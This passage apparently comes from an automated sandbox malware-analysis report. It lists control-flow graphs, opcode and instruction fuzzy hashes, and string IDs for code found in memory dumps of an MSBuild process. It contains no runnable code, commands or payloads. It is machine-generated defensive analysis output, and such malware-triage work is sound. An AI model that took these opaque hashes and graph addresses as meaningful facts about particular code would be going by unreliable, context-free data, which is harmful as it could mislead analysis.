                                                                                                  control_flow_graph 899 65e7d98-65e7db6 900 65e7db8-65e7dbb 899->900 901 65e7ddc-65e7ddf 900->901 902 65e7dbd-65e7dd7 900->902 903 65e7e02-65e7e05 901->903 904 65e7de1-65e7dfd 901->904 902->901 906 65e7e1c-65e7e1f 903->906 907 65e7e07-65e7e15 903->907 904->903 908 65e7e2c-65e7e2e 906->908 909 65e7e21-65e7e2b 906->909 915 65e7e3e-65e7e54 907->915 916 65e7e17 907->916 912 65e7e35-65e7e38 908->912 913 65e7e30 908->913 912->900 912->915 913->912 919 65e806f-65e8079 915->919 920 65e7e5a-65e7e63 915->920 916->906 921 65e807a-65e80af 920->921 922 65e7e69-65e7e86 920->922 925 65e80b1-65e80b4 921->925 929 65e805c-65e8069 922->929 930 65e7e8c-65e7eb4 922->930 926 65e80b6-65e80d2 925->926 927 65e80d7-65e80da 925->927 926->927 931 65e8187-65e818a 927->931 932 65e80e0-65e80ec 927->932 929->919 929->920 930->929 953 65e7eba-65e7ec3 930->953 933 65e83bf-65e83c1 931->933 934 65e8190-65e819f 931->934 937 65e80f7-65e80f9 932->937 938 65e83c8-65e83cb 933->938 939 65e83c3 933->939 947 65e81be-65e8202 934->947 948 65e81a1-65e81bc 934->948 943 65e80fb-65e8101 937->943 944 65e8111-65e8115 937->944 938->925 940 65e83d1-65e83da 938->940 939->938 950 65e8105-65e8107 943->950 951 65e8103 943->951 945 65e8117-65e8121 944->945 946 65e8123 944->946 952 65e8128-65e812a 945->952 946->952 959 65e8208-65e8219 947->959 960 65e8393-65e83a9 947->960 948->947 950->944 951->944 954 65e812c-65e812f 952->954 955 65e8141-65e817a 952->955 953->921 957 65e7ec9-65e7ee5 953->957 954->940 955->934 980 65e817c-65e8186 955->980 965 65e804a-65e8056 957->965 966 65e7eeb-65e7f15 957->966 970 65e837e-65e838d 959->970 971 65e821f-65e823c 959->971 960->933 965->929 965->953 982 65e7f1b-65e7f43 966->982 983 65e8040-65e8045 966->983 970->959 970->960 971->970 979 65e8242-65e8338 call 65e65a0 971->979 1032 65e833a-65e8344 979->1032 1033 65e8346 979->1033 982->983 989 65e7f49-65e7f77 982->989 983->965 989->983 995 65e7f7d-65e7f86 989->995 995->983 996 65e7f8c-65e7fbe 995->996 1004 65e7fc9-65e7fe5 996->1004 1005 65e7fc0-65e7fc4 996->1005 1004->965 1007 65e7fe7-65e803e call 65e65a0 1004->1007 1005->983 1006 65e7fc6 1005->1006 1006->1004 1007->965 1034 65e834b-65e834d 1032->1034 1033->1034 1034->970 1035 65e834f-65e8354 1034->1035 1036 65e8356-65e8360 1035->1036 1037 65e8362 1035->1037 1038 65e8367-65e8369 1036->1038 1037->1038 1038->970 1039 65e836b-65e8377 1038->1039 1039->970
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: ceaba59f77d62ed96f067835aae681f312b9afe4b7e09c273ca2885545f7067e
                                                                                                  • Instruction ID: 6bbf9f9319ff61344ff30d6f67ce288e6545919e4c1bc975f3e51ae9328326aa
                                                                                                  • Opcode Fuzzy Hash: ceaba59f77d62ed96f067835aae681f312b9afe4b7e09c273ca2885545f7067e
                                                                                                  • Instruction Fuzzy Hash: 3A02CE30B006069FDF58DB68D990AAEB7E2FF88304F158529E405DB395DB31EC86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7f2cc01b152fc2f17302e449789fff28d709474a65be096376311b6cb4097138
                                                                                                  • Instruction ID: 996ac9ba4ae5bf791ff89a4780d1a4f025448b2da6442c8cb80a6303a6e959d1
                                                                                                  • Opcode Fuzzy Hash: 7f2cc01b152fc2f17302e449789fff28d709474a65be096376311b6cb4097138
                                                                                                  • Instruction Fuzzy Hash: 0A924634E002048FDB68DB68C584A5DB7F6FB49314F5484A9E849EB369DB35EE85CF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c64efb4fa698268177e584841ce65e74ad27534cf85e232137547eeb9a81f78
                                                                                                  • Instruction ID: 2ca3bdaa446c0e843a46947d0ac3cf051842153f24b559de483965ea1dff7274
                                                                                                  • Opcode Fuzzy Hash: 0c64efb4fa698268177e584841ce65e74ad27534cf85e232137547eeb9a81f78
                                                                                                  • Instruction Fuzzy Hash: C0629D34A002058FDF58DB68D994AADB7F2FF88354F148469E40ADB395DB35ED46CB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 765412e2ef4296415b1b93b667b2375af6ea435649d00edc962fb126170cf58d
                                                                                                  • Instruction ID: 8c247b9c1adf1187f3961fb7c3cfb6319686e286ff9643f80e4484624ec6ecd0
                                                                                                  • Opcode Fuzzy Hash: 765412e2ef4296415b1b93b667b2375af6ea435649d00edc962fb126170cf58d
                                                                                                  • Instruction Fuzzy Hash: 7322E335F002158FDF68DBA4C4906AEBBB2FF85318F248469D449EB344EA32DD45CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 47d6ac05bed57ed29c3d52111a50e6390cf510a18e48b4921d78adb52ba1a1fd
                                                                                                  • Instruction ID: 8175c1f50a5c34560c14974a6dc294ae0136b598cf9f40362e6eb08df067148d
                                                                                                  • Opcode Fuzzy Hash: 47d6ac05bed57ed29c3d52111a50e6390cf510a18e48b4921d78adb52ba1a1fd
                                                                                                  • Instruction Fuzzy Hash: 03227434E002098FDF68CB6CCA807ADB7B6FB85315F248926E449DB395DA35DC858F91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 65eace8-65ead06 1 65ead08-65ead0b 0->1 2 65ead0d-65ead16 1->2 3 65ead25-65ead28 1->3 4 65eaf1f-65eaf30 2->4 5 65ead1c-65ead20 2->5 6 65ead2a-65ead2e 3->6 7 65ead39-65ead3c 3->7 15 65eafad-65eafaf 4->15 16 65eaf32-65eaf56 4->16 5->3 8 65eaf14-65eaf1e 6->8 9 65ead34 6->9 10 65ead3e-65ead43 7->10 11 65ead46-65ead49 7->11 9->7 10->11 12 65ead5d-65ead60 11->12 13 65ead4b-65ead58 11->13 17 65ead62-65ead7e 12->17 18 65ead83-65ead86 12->18 13->12 20 65eafb0-65eafb3 15->20 21 65eaf58-65eaf5b 16->21 17->18 22 65ead88-65ead9b 18->22 23 65eada0-65eada3 18->23 26 65eb21c-65eb21e 20->26 27 65eafb5-65eafb7 20->27 28 65eaf5d-65eaf67 21->28 29 65eaf68-65eaf6b 21->29 22->23 24 65eada9-65eadac 23->24 25 65eaf05-65eaf0e 23->25 34 65eadae-65eadb7 24->34 35 65eadbc-65eadbe 24->35 25->2 25->8 31 65eb225-65eb228 26->31 32 65eb220 26->32 36 65eafb9-65eaff4 27->36 37 65eaf6d call 65eb240 29->37 38 65eaf7a-65eaf7d 29->38 31->21 39 65eb22e-65eb238 31->39 32->31 34->35 40 65eadc5-65eadc8 35->40 41 65eadc0 35->41 50 65eaffa-65eb006 36->50 51 65eb1e7-65eb1fa 36->51 49 65eaf73-65eaf75 37->49 43 65eaf7f-65eaf83 38->43 44 65eaf8a-65eaf8d 38->44 40->1 47 65eadce-65eadf2 40->47 41->40 43->36 45 65eaf85 43->45 44->20 46 65eaf8f-65eafab 44->46 45->44 46->15 61 65eadf8-65eae07 47->61 62 65eaf02 47->62 49->38 58 65eb008-65eb021 50->58 59 65eb026-65eb06a 50->59 54 65eb1fc 51->54 60 65eb1fd 54->60 58->54 77 65eb06c-65eb07e 59->77 78 65eb086-65eb0c5 59->78 60->60 66 65eae1f-65eae5a call 65e65a0 61->66 67 65eae09-65eae0f 61->67 62->25 86 65eae5c-65eae62 66->86 87 65eae72-65eae89 66->87 68 65eae13-65eae15 67->68 69 65eae11 67->69 68->66 69->66 77->78 82 65eb1ac-65eb1c1 78->82 83 65eb0cb-65eb1a6 call 65e65a0 78->83 82->51 83->82 90 65eae66-65eae68 86->90 91 65eae64 86->91 96 65eae8b-65eae91 87->96 97 65eaea1-65eaeb2 87->97 90->87 91->87 99 65eae95-65eae97 96->99 100 65eae93 96->100 103 65eaeca-65eaefb 97->103 104 65eaeb4-65eaeba 97->104 99->97 100->97 103->62 105 65eaebe-65eaec0 104->105 106 65eaebc 104->106 105->103 106->103
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: 7695e96eaba6a2be1e1350f1919f73d8622334668f47cc119a6e22d5f9811fbd
                                                                                                  • Instruction ID: 3fdd25a5cd89340bdcb43ec83e3cea2e7883f2b225f71fbab57ed0287b5a8214
                                                                                                  • Opcode Fuzzy Hash: 7695e96eaba6a2be1e1350f1919f73d8622334668f47cc119a6e22d5f9811fbd
                                                                                                  • Instruction Fuzzy Hash: DCE17A34E1030A8FDF69DFB8D9806AEB7B2FF85305F108929E415AB355DB34D8468B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 258 65eb668-65eb68a 259 65eb68c-65eb68f 258->259 260 65eb6cd-65eb6d0 259->260 261 65eb691-65eb6a6 259->261 262 65eb6f7-65eb6fa 260->262 263 65eb6d2-65eb6d6 260->263 268 65eba02-65eba36 261->268 273 65eb6ac-65eb6c8 261->273 264 65eb6fc-65eb705 262->264 265 65eb710-65eb713 262->265 267 65eb6dc-65eb6ec 263->267 263->268 269 65eb70b 264->269 270 65eb963-65eb96c 264->270 271 65eb73a-65eb73d 265->271 272 65eb715-65eb719 265->272 280 65eb9b2-65eb9b6 267->280 281 65eb6f2 267->281 282 65eba38-65eba3b 268->282 269->265 270->268 275 65eb972-65eb979 270->275 276 65eb73f-65eb75b 271->276 277 65eb760-65eb763 271->277 272->268 274 65eb71f-65eb72f 272->274 273->260 301 65eb7fa-65eb7fd 274->301 302 65eb735 274->302 286 65eb97e-65eb981 275->286 276->277 283 65eb7c4-65eb7c7 277->283 284 65eb765-65eb7bf call 65e65a0 277->284 280->268 291 65eb9b8-65eb9c8 280->291 281->262 287 65eba5e-65eba61 282->287 288 65eba3d-65eba59 282->288 289 65eb7c9-65eb7ce 283->289 290 65eb7d1-65eb7d4 283->290 284->283 293 65eb983-65eb98c 286->293 294 65eb991-65eb994 286->294 299 65ebccd-65ebccf 287->299 300 65eba67-65eba8f 287->300 288->287 289->290 296 65eb7d6-65eb7dc 290->296 297 65eb7e1-65eb7e4 290->297 291->272 317 65eb9ce 291->317 293->294 303 65eb9ad-65eb9b0 294->303 304 65eb996-65eb99f 294->304 296->297 309 65eb7e6-65eb7f0 297->309 310 65eb7f5-65eb7f8 297->310 312 65ebcd6-65ebcd9 299->312 313 65ebcd1 299->313 343 65eba99-65ebadd 300->343 344 65eba91-65eba94 300->344 314 65eb802-65eb805 301->314 302->271 303->280 306 65eb9d3-65eb9d6 303->306 304->268 305 65eb9a1-65eb9a8 304->305 305->303 306->301 318 65eb9dc-65eb9df 306->318 309->310 310->301 310->314 312->282 319 65ebcdf-65ebce8 312->319 313->312 321 65eb807-65eb80d 314->321 322 65eb812-65eb815 314->322 317->306 318->264 325 65eb9e5-65eb9e7 318->325 321->322 326 65eb817-65eb81b 322->326 327 65eb822-65eb825 322->327 330 65eb9ee-65eb9f1 325->330 331 65eb9e9 325->331 326->321 333 65eb81d 326->333 327->301 328 65eb827-65eb82a 327->328 328->301 334 65eb82c-65eb82f 328->334 330->259 335 65eb9f7-65eba01 330->335 331->330 333->327 336 65eb846-65eb849 334->336 337 65eb831-65eb835 334->337 341 65eb86b-65eb86e 336->341 342 65eb84b-65eb866 336->342 337->268 340 65eb83b-65eb841 337->340 340->336 345 65eb8ce-65eb8d7 341->345 346 65eb870-65eb873 341->346 342->341 375 65ebcc2-65ebccc 343->375 376 65ebae3-65ebaec 343->376 344->319 345->304 350 65eb8dd 345->350 351 65eb875-65eb88a 346->351 352 65eb8b2-65eb8b5 346->352 355 65eb8e2-65eb8e5 350->355 351->268 365 65eb890-65eb8ad 351->365 353 65eb8c9-65eb8cc 352->353 354 65eb8b7-65eb8bb 352->354 353->345 353->355 354->268 358 65eb8c1-65eb8c4 354->358 360 65eb8f7-65eb8fa 355->360 361 65eb8e7 355->361 358->353 363 65eb8fc-65eb900 360->363 364 65eb911-65eb914 360->364 370 65eb8ef-65eb8f2 361->370 363->268 371 65eb906-65eb90c 363->371 367 65eb916-65eb91c 364->367 368 65eb921-65eb924 364->368 365->352 367->368 373 65eb926-65eb92c 368->373 374 65eb931-65eb934 368->374 370->360 371->364 373->374 377 65eb93e-65eb941 374->377 378 65eb936-65eb93b 374->378 379 65ebcb8-65ebcbd 376->379 380 65ebaf2-65ebb5e call 65e65a0 376->380 381 65eb94b-65eb94e 377->381 382 65eb943-65eb946 377->382 378->377 379->375 392 65ebc58-65ebc6d 380->392 393 65ebb64-65ebb69 380->393 384 65eb95e-65eb961 381->384 385 65eb950-65eb959 381->385 382->381 384->270 384->286 385->384 392->379 394 65ebb6b-65ebb71 393->394 395 65ebb85 393->395 397 65ebb77-65ebb79 394->397 398 65ebb73-65ebb75 394->398 399 65ebb87-65ebb8d 395->399 400 65ebb83 397->400 398->400 401 65ebb8f-65ebb95 399->401 402 65ebba2-65ebbaf 399->402 400->399 403 65ebb9b 401->403 404 65ebc43-65ebc52 401->404 409 65ebbc7-65ebbd4 402->409 410 65ebbb1-65ebbb7 402->410 403->402 405 65ebc0a-65ebc17 403->405 406 65ebbd6-65ebbe3 403->406 404->392 404->393 415 65ebc2f-65ebc3c 405->415 416 65ebc19-65ebc1f 405->416 418 65ebbfb-65ebc08 406->418 419 65ebbe5-65ebbeb 406->419 409->404 411 65ebbbb-65ebbbd 410->411 412 65ebbb9 410->412 411->409 412->409 415->404 420 65ebc23-65ebc25 416->420 421 65ebc21 416->421 418->404 422 65ebbef-65ebbf1 419->422 423 65ebbed 419->423 420->415 421->415 422->418 423->418
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 4f663af64f4ea3844e61830b54fb064b7dbfb23e91eb5160b3d98493ddf7bff8
                                                                                                  • Instruction ID: 932fe1b0e0159b6f387d1c21c6019303daea2fdc392a0a7de1df08bbf3e73a31
                                                                                                  • Opcode Fuzzy Hash: 4f663af64f4ea3844e61830b54fb064b7dbfb23e91eb5160b3d98493ddf7bff8
                                                                                                  • Instruction Fuzzy Hash: 62027D30E0020A8FDF68CF68D6806ADB7B2FB85316F24896AD449DB355DB31DD85CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 426 65e9168-65e918d 427 65e918f-65e9192 426->427 428 65e9198-65e91ad 427->428 429 65e9a50-65e9a53 427->429 436 65e91af-65e91b5 428->436 437 65e91c5-65e91db 428->437 430 65e9a79-65e9a7b 429->430 431 65e9a55-65e9a74 429->431 433 65e9a7d 430->433 434 65e9a82-65e9a85 430->434 431->430 433->434 434->427 435 65e9a8b-65e9a95 434->435 439 65e91b9-65e91bb 436->439 440 65e91b7 436->440 443 65e91e6-65e91e8 437->443 439->437 440->437 444 65e91ea-65e91f0 443->444 445 65e9200-65e9271 443->445 446 65e91f4-65e91f6 444->446 447 65e91f2 444->447 456 65e929d-65e92b9 445->456 457 65e9273-65e9296 445->457 446->445 447->445 462 65e92bb-65e92de 456->462 463 65e92e5-65e9300 456->463 457->456 462->463 468 65e932b-65e9346 463->468 469 65e9302-65e9324 463->469 474 65e936b-65e9379 468->474 475 65e9348-65e9364 468->475 469->468 476 65e937b-65e9384 474->476 477 65e9389-65e9403 474->477 475->474 476->435 483 65e9405-65e9423 477->483 484 65e9450-65e9465 477->484 488 65e943f-65e944e 483->488 489 65e9425-65e9434 483->489 484->429 488->483 488->484 489->488
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: b7963444acc773d7c71a748378eb35b97bdeeb02f0fa0637d7aab722e15cefab
                                                                                                  • Instruction ID: fec2d2a920228414833f2c8b78bca0e29d130656f4c5789fdc422df42b98d0e2
                                                                                                  • Opcode Fuzzy Hash: b7963444acc773d7c71a748378eb35b97bdeeb02f0fa0637d7aab722e15cefab
                                                                                                  • Instruction Fuzzy Hash: F8913D34B0021A9FDF58DB69D9507AEB3F6BFC9244F108469C409EB384EE719D868B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 492 65ecf50-65ecf6b 493 65ecf6d-65ecf70 492->493 494 65ecfb9-65ecfbc 493->494 495 65ecf72-65ecfb4 493->495 496 65ecfbe-65ecfda 494->496 497 65ecfdf-65ecfe2 494->497 495->494 496->497 498 65ed02b-65ed02e 497->498 499 65ecfe4-65ecff3 497->499 504 65ed03d-65ed040 498->504 505 65ed030-65ed032 498->505 502 65ecff5-65ecffa 499->502 503 65ed002-65ed00e 499->503 502->503 509 65ed96d-65ed9a6 503->509 510 65ed014-65ed026 503->510 506 65ed089-65ed08c 504->506 507 65ed042-65ed084 504->507 511 65ed038 505->511 512 65ed2f7-65ed300 505->512 516 65ed08e-65ed0d0 506->516 517 65ed0d5-65ed0d8 506->517 507->506 526 65ed9a8-65ed9ab 509->526 510->498 511->504 514 65ed30f-65ed31b 512->514 515 65ed302-65ed307 512->515 523 65ed42c-65ed431 514->523 524 65ed321-65ed335 514->524 515->514 516->517 519 65ed0da-65ed11c 517->519 520 65ed121-65ed124 517->520 519->520 527 65ed16d-65ed170 520->527 528 65ed126-65ed168 520->528 541 65ed439 523->541 540 65ed33b-65ed34d 524->540 524->541 531 65ed9ad call 65edac5 526->531 532 65ed9ba-65ed9bd 526->532 533 65ed1b9-65ed1bc 527->533 534 65ed172-65ed1b4 527->534 528->527 552 65ed9b3-65ed9b5 531->552 542 65ed9bf-65ed9db 532->542 543 65ed9e0-65ed9e3 532->543 545 65ed1be-65ed1c3 533->545 546 65ed1c6-65ed1c9 533->546 534->533 569 65ed34f-65ed355 540->569 570 65ed371-65ed373 540->570 549 65ed43c-65ed448 541->549 542->543 554 65eda16-65eda18 543->554 555 65ed9e5-65eda11 543->555 545->546 550 65ed1cb-65ed1e1 546->550 551 65ed1e6-65ed1e9 546->551 559 65ed44e-65ed73b 549->559 560 65ed252-65ed261 549->560 550->551 561 65ed1eb-65ed22d 551->561 562 65ed232-65ed235 551->562 552->532 565 65eda1f-65eda22 554->565 566 65eda1a 554->566 555->554 705 65ed962-65ed96c 559->705 706 65ed741-65ed747 559->706 572 65ed263-65ed268 560->572 573 65ed270-65ed27c 560->573 561->562 567 65ed237-65ed239 562->567 568 65ed244-65ed247 562->568 565->526 577 65eda24-65eda33 565->577 566->565 567->541 578 65ed23f 567->578 568->549 579 65ed24d-65ed250 568->579 581 65ed359-65ed365 569->581 582 65ed357 569->582 592 65ed37d-65ed389 570->592 572->573 573->509 583 65ed282-65ed294 573->583 596 65eda9a-65edaaf 577->596 597 65eda35-65eda98 call 65e65a0 577->597 578->568 579->560 589 65ed299-65ed29c 579->589 590 65ed367-65ed36f 581->590 582->590 583->589 601 65ed29e-65ed2e0 589->601 602 65ed2e5-65ed2e7 589->602 590->592 615 65ed38b-65ed395 592->615 616 65ed397 592->616 623 65edab0 596->623 597->596 601->602 611 65ed2ee-65ed2f1 602->611 612 65ed2e9 602->612 611->493 611->512 612->611 622 65ed39c-65ed39e 615->622 616->622 622->541 626 65ed3a4-65ed3c0 call 65e65a0 622->626 623->623 639 65ed3cf-65ed3db 626->639 640 65ed3c2-65ed3c7 626->640 639->523 643 65ed3dd-65ed42a 639->643 640->639 643->541 707 65ed749-65ed74e 706->707 708 65ed756-65ed75f 706->708 707->708 708->509 709 65ed765-65ed778 708->709 711 65ed77e-65ed784 709->711 712 65ed952-65ed95c 709->712 713 65ed786-65ed78b 711->713 714 65ed793-65ed79c 711->714 712->705 712->706 713->714 714->509 715 65ed7a2-65ed7c3 714->715 718 65ed7c5-65ed7ca 715->718 719 65ed7d2-65ed7db 715->719 718->719 719->509 720 65ed7e1-65ed7fe 719->720 720->712 723 65ed804-65ed80a 720->723 723->509 724 65ed810-65ed829 723->724 726 65ed82f-65ed856 724->726 727 65ed945-65ed94c 724->727 726->509 730 65ed85c-65ed866 726->730 727->712 727->723 730->509 731 65ed86c-65ed883 730->731 733 65ed885-65ed890 731->733 734 65ed892-65ed8ad 731->734 733->734 734->727 739 65ed8b3-65ed8cc call 65e65a0 734->739 743 65ed8ce-65ed8d3 739->743 744 65ed8db-65ed8e4 739->744 743->744 744->509 745 65ed8ea-65ed93e 744->745 745->727
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q
                                                                                                  • API String ID: 0-831282457
                                                                                                  • Opcode ID: 1bafe24c7e1db6e3575f476a0ba5e9673687060207325213a275cd39bf0e842b
                                                                                                  • Instruction ID: dbb6a7a6b1e5c18c5580bbe3d46fb76db3d70b642d34adbd5665ab0511ad995c
                                                                                                  • Opcode Fuzzy Hash: 1bafe24c7e1db6e3575f476a0ba5e9673687060207325213a275cd39bf0e842b
                                                                                                  • Instruction Fuzzy Hash: 6E623130A0070A8FCB59EB68DA91A5DB7F2FF84304F108A69D4159F759DB71ED4ACB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 753 65e4b78-65e4b9c 754 65e4b9e-65e4ba1 753->754 755 65e4bc2-65e4bc5 754->755 756 65e4ba3-65e4bbd 754->756 757 65e4bcb-65e4cc3 755->757 758 65e52a4-65e52a6 755->758 756->755 776 65e4cc9-65e4d16 call 65e5420 757->776 777 65e4d46-65e4d4d 757->777 759 65e52ad-65e52b0 758->759 760 65e52a8 758->760 759->754 762 65e52b6-65e52c3 759->762 760->759 790 65e4d1c-65e4d38 776->790 778 65e4d53-65e4dc3 777->778 779 65e4dd1-65e4dda 777->779 796 65e4dce 778->796 797 65e4dc5 778->797 779->762 793 65e4d3a 790->793 794 65e4d43 790->794 793->794 794->777 796->779 797->796
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fcq$XPcq$\Ocq
                                                                                                  • API String ID: 0-3575482020
                                                                                                  • Opcode ID: 6a6fdfbf814e62faa06e7cb01f2c2d84094b815588f9eec84a4681eac6b2af0e
                                                                                                  • Instruction ID: cc0143aea7e70183d7a7ee903e1836215408d1d6a0bc977f68a834825fafc349
                                                                                                  • Opcode Fuzzy Hash: 6a6fdfbf814e62faa06e7cb01f2c2d84094b815588f9eec84a4681eac6b2af0e
                                                                                                  • Instruction Fuzzy Hash: B4618134F002089FEF559FA8C8547AEBBF6FF88340F208429D509EB395DA758D459B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1173 65e9159-65e918d 1175 65e918f-65e9192 1173->1175 1176 65e9198-65e91ad 1175->1176 1177 65e9a50-65e9a53 1175->1177 1184 65e91af-65e91b5 1176->1184 1185 65e91c5-65e91db 1176->1185 1178 65e9a79-65e9a7b 1177->1178 1179 65e9a55-65e9a74 1177->1179 1181 65e9a7d 1178->1181 1182 65e9a82-65e9a85 1178->1182 1179->1178 1181->1182 1182->1175 1183 65e9a8b-65e9a95 1182->1183 1187 65e91b9-65e91bb 1184->1187 1188 65e91b7 1184->1188 1191 65e91e6-65e91e8 1185->1191 1187->1185 1188->1185 1192 65e91ea-65e91f0 1191->1192 1193 65e9200-65e9271 1191->1193 1194 65e91f4-65e91f6 1192->1194 1195 65e91f2 1192->1195 1204 65e929d-65e92b9 1193->1204 1205 65e9273-65e9296 1193->1205 1194->1193 1195->1193 1210 65e92bb-65e92de 1204->1210 1211 65e92e5-65e9300 1204->1211 1205->1204 1210->1211 1216 65e932b-65e9346 1211->1216 1217 65e9302-65e9324 1211->1217 1222 65e936b-65e9379 1216->1222 1223 65e9348-65e9364 1216->1223 1217->1216 1224 65e937b-65e9384 1222->1224 1225 65e9389-65e9403 1222->1225 1223->1222 1224->1183 1231 65e9405-65e9423 1225->1231 1232 65e9450-65e9465 1225->1232 1236 65e943f-65e944e 1231->1236 1237 65e9425-65e9434 1231->1237 1232->1177 1236->1231 1236->1232 1237->1236
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: 165ff9d70d31646ba0a05e44e0201bafef9262e29fef41eaf717808ca491c516
                                                                                                  • Instruction ID: aabbb5b3b68ebd9ab3314e2a98eecb454040fdf10614e55460f5a3e12f42fa8c
                                                                                                  • Opcode Fuzzy Hash: 165ff9d70d31646ba0a05e44e0201bafef9262e29fef41eaf717808ca491c516
                                                                                                  • Instruction Fuzzy Hash: 0B512F34B002059FDB59DB79D990BAEB3F6AF89648F108469D40ADB384DE31DC42CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
